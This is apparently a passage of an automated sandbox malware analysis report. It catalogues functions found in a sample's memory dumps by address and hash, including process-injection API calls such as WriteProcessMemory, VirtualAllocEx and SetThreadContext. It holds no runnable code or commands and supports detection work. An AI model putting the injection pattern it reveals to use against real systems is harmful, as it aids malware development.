                                                • CreateActCtxA.KERNEL32(?), ref: 012A59A9
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1727946587.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_12a0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: d5858dfc08dc530b3f40533435ae4a94cb650f0229e05edcd691021d2e69afc1
                                                • Instruction ID: a1c611a2bd0fdb10716b756888eaec08850fda7fba9100a8e5046b697926b1e2
                                                • Opcode Fuzzy Hash: d5858dfc08dc530b3f40533435ae4a94cb650f0229e05edcd691021d2e69afc1
                                                • Instruction Fuzzy Hash: 4441DFB0D10719CFDB24CFA9C884B8EBBF5BF49304F64806AD408AB255DB756945CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012AD3A1 Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,012AD2A6,?,?,?,?,?), ref: 012AD367
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1727946587.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_12a0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 8be1de6119436a10eea4cc7fa2a3838f00d9c68fa2c39b7ed6e1f60f239d0f38
                                                • Instruction ID: cc460150707dce32542ea8687a1b5f0f2dec5b29dbabff8aae99d2d3e852b7ab
                                                • Opcode Fuzzy Hash: 8be1de6119436a10eea4cc7fa2a3838f00d9c68fa2c39b7ed6e1f60f239d0f38
                                                • Instruction Fuzzy Hash: B7316B78A41344AFF7249FA0FA997693FA6F788314F21852AE9018B7C8DB754941CF10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06D2E391 Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                Download Yara Rule
                                                APIs
                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,06D2E37D,?,?), ref: 06D2E42F
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1735869389.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6d20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: DrawText
                                                • String ID:
                                                • API String ID: 2175133113-0
                                                • Opcode ID: 23c8bbbbbdae8c5b8677d27588c0e37e2d44a7b230b14899daa81ecb91284067
                                                • Instruction ID: 920100d473e5cdbf17be2fe9789e10dc073a2ab28acfc8666041e90bd37d9055
                                                • Opcode Fuzzy Hash: 23c8bbbbbdae8c5b8677d27588c0e37e2d44a7b230b14899daa81ecb91284067
                                                • Instruction Fuzzy Hash: 9731F1B5D012199FCB10CF9AD884ADEFBF4BB48314F14842AE818A7210D374A945CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06D2CDB4 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                Download Yara Rule
                                                APIs
                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,06D2E37D,?,?), ref: 06D2E42F
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1735869389.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6d20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: DrawText
                                                • String ID:
                                                • API String ID: 2175133113-0
                                                • Opcode ID: adf1a50aa71cfb98edcf3e8f2457cfcd81e81ea0dbf745aba3ea7351a86718d7
                                                • Instruction ID: 8eaefc8184d3fcfb59b1d0c97b25ac52de96aa50ce78a572e3d107de2b78492c
                                                • Opcode Fuzzy Hash: adf1a50aa71cfb98edcf3e8f2457cfcd81e81ea0dbf745aba3ea7351a86718d7
                                                • Instruction Fuzzy Hash: 7831F1B1D003199FDB50CF9AD884A9EBBF4FB58314F14842AE818A7310D374A941CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04C2786A Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04C27900
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1734265425.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_4c20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 903b675bff9926696bf62e3b841c1c6263f3f8e55ca0d141c6d9118f91d81c82
                                                • Instruction ID: 28931730e9227d4abb996863f3a8c941e1fbb28fc42ac6e215a80a9959f0b558
                                                • Opcode Fuzzy Hash: 903b675bff9926696bf62e3b841c1c6263f3f8e55ca0d141c6d9118f91d81c82
                                                • Instruction Fuzzy Hash: C82157B1D013199FCB10DFA9C985BDEBBF1FF48310F108429E958A7251C7789A54CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04C27870 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04C27900
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1734265425.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_4c20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: fe4049ad29a3da4e28ef66c4cf6309e6259124b86eaa117e6c1d22149d48ab0d
                                                • Instruction ID: d20c3ce9b0ee1a502f419f04ec8c70267bc9aaf2b4f5c4c974b33aeb00bd5ede
                                                • Opcode Fuzzy Hash: fe4049ad29a3da4e28ef66c4cf6309e6259124b86eaa117e6c1d22149d48ab0d
                                                • Instruction Fuzzy Hash: BD2157B1D003199FCB10DFA9C985BDEBBF5FF48310F108429E958A7251C778A944CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04C27958 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04C279E0
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1734265425.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_4c20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: d9f2d9af9dc2db73241721fea0843d3bc26c70c970ebebcb1a74a556bc60304a
                                                • Instruction ID: c9ed1e706900322b6e73ebc35c210fae16f1067b40e21c2349520355cb6679d4
                                                • Opcode Fuzzy Hash: d9f2d9af9dc2db73241721fea0843d3bc26c70c970ebebcb1a74a556bc60304a
                                                • Instruction Fuzzy Hash: BF2148B1C013599FCB10DFA9C880ADEFBF1FF48320F10842AE558A7250C7799945CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04C276D0 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04C27756
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1734265425.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_4c20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: b9f871d071ca1e1b08119fb5aec49e667db9999800385ceb1cfd50538315d6fa
                                                • Instruction ID: dbac2040fe76a5f2340f18ae9bcba7e7a6c56626e73774534e0f71f431727ef2
                                                • Opcode Fuzzy Hash: b9f871d071ca1e1b08119fb5aec49e667db9999800385ceb1cfd50538315d6fa
                                                • Instruction Fuzzy Hash: 2D2168B1D002088FDB10DFAAC5857EEBFF5EF88320F108429D459A7241C778AA85CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012AB350 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,012AD2A6,?,?,?,?,?), ref: 012AD367
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1727946587.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_12a0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 6299cde04193536abee70cc9b1029fffaabdd5a15a80d868e799bd14ac48714d
                                                • Instruction ID: 802315e14d07b551a0a231d903e1e4f306e8e578084beed2a3cfb0d8b9ff8440
                                                • Opcode Fuzzy Hash: 6299cde04193536abee70cc9b1029fffaabdd5a15a80d868e799bd14ac48714d
                                                • Instruction Fuzzy Hash: 5821E3B5900208DFDB10CFAAD984ADEBFF4EB48320F14845AE914A7311D375A950CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04C27960 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04C279E0
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1734265425.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_4c20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: ddeaaea1b787cf24d22e01a95deceb3035f3378594a32420165bbef1e2362b43
                                                • Instruction ID: 6b2dba6fb401cddd432f843361af2d5bf827e348c53705d2207faa5fa73ff97b
                                                • Opcode Fuzzy Hash: ddeaaea1b787cf24d22e01a95deceb3035f3378594a32420165bbef1e2362b43
                                                • Instruction Fuzzy Hash: DA2128B1C013599FCB10DFAAC981ADEFBF5FF48310F10842AE558A7250C774A544CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04C276D8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04C27756
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1734265425.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_4c20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 848fb44263344399f603254379d750b2b35490ba732687f64f00269fa21eb3f8
                                                • Instruction ID: 86dcfc7d47f660235090ea7a98a6f34df5b5a4b3edda4d20791cb4e01bee9be3
                                                • Opcode Fuzzy Hash: 848fb44263344399f603254379d750b2b35490ba732687f64f00269fa21eb3f8
                                                • Instruction Fuzzy Hash: 442138B1D003198FDB10DFAAC5857EEBBF5EF88324F108429D459A7241C778A984CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012AD2D8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,012AD2A6,?,?,?,?,?), ref: 012AD367
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1727946587.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_12a0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 4251e49a535c9173234e072fc4878eb53305dd39373e7eafb44722375d199aca
                                                • Instruction ID: e9e358a58424ca281617d15de51a9a8762ab18ad037444508b008cafcb14ee03
                                                • Opcode Fuzzy Hash: 4251e49a535c9173234e072fc4878eb53305dd39373e7eafb44722375d199aca
                                                • Instruction Fuzzy Hash: 9821E0B5900248DFDB10CFA9D584ADEBFF4FB48320F14846AE958A3311D378A940CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012AAF88 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012AB3D1,00000800,00000000,00000000), ref: 012AB5C2
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1727946587.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_12a0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: c1169c4a06f4959c5f9b3caa2a2ea72d95f38c6af6c0470c67bc7efa80fddf25
                                                • Instruction ID: c63ffa8aef49a5d8a87e6ee6f42124ae87988803ce8decb07c07ec2c71012136
                                                • Opcode Fuzzy Hash: c1169c4a06f4959c5f9b3caa2a2ea72d95f38c6af6c0470c67bc7efa80fddf25
                                                • Instruction Fuzzy Hash: B01123B6D103498FDB24CF9AD848ADEFBF4EB88310F50842EE559A7210C375A544CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04C277AA Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04C2781E
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1734265425.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_4c20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 074eb11cbc6d3b839c6052952e53944b01c3437d4bcf6172ceb66a96bb6d88ea
                                                • Instruction ID: 167b405ffb4202016d89d14f144bc939fee4cdf4f66ffe0c9fb769531d59b66a
                                                • Opcode Fuzzy Hash: 074eb11cbc6d3b839c6052952e53944b01c3437d4bcf6172ceb66a96bb6d88ea
                                                • Instruction Fuzzy Hash: 451156B2D002488FCB10DFA9C844ADEBFF5EF88320F208419E519A7250C775A540CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04C277B0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04C2781E
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1734265425.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_4c20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 8b6bbc80c0b1c7cf875f29043e7db3b06049750e0ead625de8179917bcc7bd75
                                                • Instruction ID: 1ab6b0e249e4eda9e10c04452c27e60971e2286854b2fa6961a71b3c16f93ffc
                                                • Opcode Fuzzy Hash: 8b6bbc80c0b1c7cf875f29043e7db3b06049750e0ead625de8179917bcc7bd75
                                                • Instruction Fuzzy Hash: 071126B19002499FCB10DFAAC944ADEBBF5EB88324F108419E559A7250C775A544CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012AB550 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012AB3D1,00000800,00000000,00000000), ref: 012AB5C2
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1727946587.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_12a0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 136029d196039fa25f703db15fd49ef2e8eb576f3ea7f0faefb60ec64e7429e9
                                                • Instruction ID: 774da3ce22667f0a70f17ebd6bd8a54c7af14f553697dbf8d834e3fa6113ebad
                                                • Opcode Fuzzy Hash: 136029d196039fa25f703db15fd49ef2e8eb576f3ea7f0faefb60ec64e7429e9
                                                • Instruction Fuzzy Hash: C11123B6D003098FDB10CF9AD544ADEFBF4AB48310F14842AD559A7211C379A585CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04C271EA Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1734265425.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_4c20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: bfe32c125c0ae8f97ca6dd67f332b4e7829c8dd72853cb40c3c67889040fbcbe
                                                • Instruction ID: f157ef2a3c16ede2500aecb523128576e526faf5a5180b9f617fa321762b9939
                                                • Opcode Fuzzy Hash: bfe32c125c0ae8f97ca6dd67f332b4e7829c8dd72853cb40c3c67889040fbcbe
                                                • Instruction Fuzzy Hash: D11128B1D002588FDB10DFAAC5857EEFBF5EB88324F208419D459A7250C775A544CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04C271F0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1734265425.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_4c20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 3495e1507f7f72a1adafdb5ca675b728eb221d48b230e46d90588a0119965662
                                                • Instruction ID: 3f03db9a79f0aa5070240e8d35ac92e4267c3972d7dff14488d784e1aac5a5a8
                                                • Opcode Fuzzy Hash: 3495e1507f7f72a1adafdb5ca675b728eb221d48b230e46d90588a0119965662
                                                • Instruction Fuzzy Hash: 9E1136B1D003588FDB20DFAAC5457EEFBF5EB88324F20842AD459A7250CB75A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04C292A0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 04C2B0BD
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1734265425.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_4c20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: fb522179951a3aaa9d4eab38ad1ab7c781023f8e4f8f45f103f64ebb8809a067
                                                • Instruction ID: 5169f4565eea5f0bace62a95400172f5456572239b80a51b6112a05518980758
                                                • Opcode Fuzzy Hash: fb522179951a3aaa9d4eab38ad1ab7c781023f8e4f8f45f103f64ebb8809a067
                                                • Instruction Fuzzy Hash: A41136B5800309DFCB10DF8AD584BDEFBF8EB48320F108419E524A7210D3B5A980CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012AAEF0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 012AAF56
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1727946587.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_12a0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 9f000e6f41e6a92b605de59ad85cec766ad1e0f3cd5480a1ddb88c2fbf4ae337
                                                • Instruction ID: 63f7298e3d9c9fca1b1bcf835070122b3a62be0e933a23bad3e04b767f4ebbcf
                                                • Opcode Fuzzy Hash: 9f000e6f41e6a92b605de59ad85cec766ad1e0f3cd5480a1ddb88c2fbf4ae337
                                                • Instruction Fuzzy Hash: 761110B5C003498FDB14CF9AC444ADEFBF8AF88320F10846AD569B7250C379A545CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04C2B058 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 04C2B0BD
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1734265425.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_4c20000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 7d38fa844cdcc71a76724be8ff720272d91828d0621c4dd0b7d70ad2c9138f7c
                                                • Instruction ID: 2f752b8ac9821206f1d4d69555381ea365f059509c55abbeb9d7b5ba0d26d3b1
                                                • Opcode Fuzzy Hash: 7d38fa844cdcc71a76724be8ff720272d91828d0621c4dd0b7d70ad2c9138f7c
                                                • Instruction Fuzzy Hash: 1F1103B58003499FDB10DF99D585BDEFBF4EB48320F208419E568A7250D3B5AA84CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06FC2CDC Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q
                                                • API String ID: 0-671973202
                                                • Opcode ID: 383c308c414fa5a51649075f7a22f7757121e599219523238c46aba0afe930ab
                                                • Instruction ID: 8e5bcd4c2cfb5ce82e604c8b4129aaf131c3a65deacde31a883cab68b9c2739e
                                                • Opcode Fuzzy Hash: 383c308c414fa5a51649075f7a22f7757121e599219523238c46aba0afe930ab
                                                • Instruction Fuzzy Hash: E251EE35B142468FCB05DF7998888AEBBF6FFC4220724896AE069DB391DB30DC058790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06FC8F69 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: O};5
                                                • API String ID: 0-3558557551
                                                • Opcode ID: 4925a8dc8b071ecb71e1a5568d64e4d15cf3a83d881c2082a3af80b2c5f66ea7
                                                • Instruction ID: 5f0d78bf1d68fe931703c2975effcaa05d5dad54ac8e6d9d8b154b97be019adf
                                                • Opcode Fuzzy Hash: 4925a8dc8b071ecb71e1a5568d64e4d15cf3a83d881c2082a3af80b2c5f66ea7
                                                • Instruction Fuzzy Hash: 9941B174A0420ADFCB84CF95D6848AEFFB2FF8A310B20949AD555E7329D730DA20CB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06FC8F78 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: O};5
                                                • API String ID: 0-3558557551
                                                • Opcode ID: b1e1e6afa9db829f275f06c1698e75083e7b99f3b2290567eeb0d77d13cabc9a
                                                • Instruction ID: 4b563aa524be2c1e22989dd9f8278052a710f23749700f410fe5925e1ee7fb27
                                                • Opcode Fuzzy Hash: b1e1e6afa9db829f275f06c1698e75083e7b99f3b2290567eeb0d77d13cabc9a
                                                • Instruction Fuzzy Hash: 82414C74A1420ADFDB84CF99D6848AEFBB2FB89310F609899D559A7318D730DA10CB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06FCAE78 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q
                                                • API String ID: 0-671973202
                                                • Opcode ID: 87fb8e5a4e91498d7b1726adf4419951e4ffd21cdf02d3371099982e8ad55b8c
                                                • Instruction ID: 98adb2ae2b53258cd1c5b25298a4be0d0344e100aff8eda3d9b74b5c2210e992
                                                • Opcode Fuzzy Hash: 87fb8e5a4e91498d7b1726adf4419951e4ffd21cdf02d3371099982e8ad55b8c
                                                • Instruction Fuzzy Hash: B7112E71F0021A8FCB94EBB99A505EEB7F6AF84320B50456EC505E7244EF319E16CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06FC34EF Relevance: .2, Instructions: 163COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d1f4b8b2306823c38ffa866df84c66398b433be016d9d3c051eda694fd4a0f0f
                                                • Instruction ID: 3d421d0ad8f0f71abefbab0c62dcf5a4f3ed51fe7b1eeb20bd991184d0285d8a
                                                • Opcode Fuzzy Hash: d1f4b8b2306823c38ffa866df84c66398b433be016d9d3c051eda694fd4a0f0f
                                                • Instruction Fuzzy Hash: EB519073E04117CFDB90CB69CA406BEB7B2BB452A1F04C52EE5669B281D739D940CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06FC8E10 Relevance: .1, Instructions: 127COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 06e80f2d72c22ce2e26b4484f3586ffd1340e559e3c1bbc518efc555614dbb92
                                                • Instruction ID: f66a8fba487a01376c29b510622358c52f9bee2546e94a4d6f8974d0acd0f87d
                                                • Opcode Fuzzy Hash: 06e80f2d72c22ce2e26b4484f3586ffd1340e559e3c1bbc518efc555614dbb92
                                                • Instruction Fuzzy Hash: 004197B89097C48FC706CFA9D440948BFB0AF8A211F1A84DBC484DB3A3D6359999CB12
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06FC90F0 Relevance: .1, Instructions: 115COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1736650223.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6fc0000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1506c278a113fa70b386a468c827e45c196e0c481d5320c09537f2109f369b38
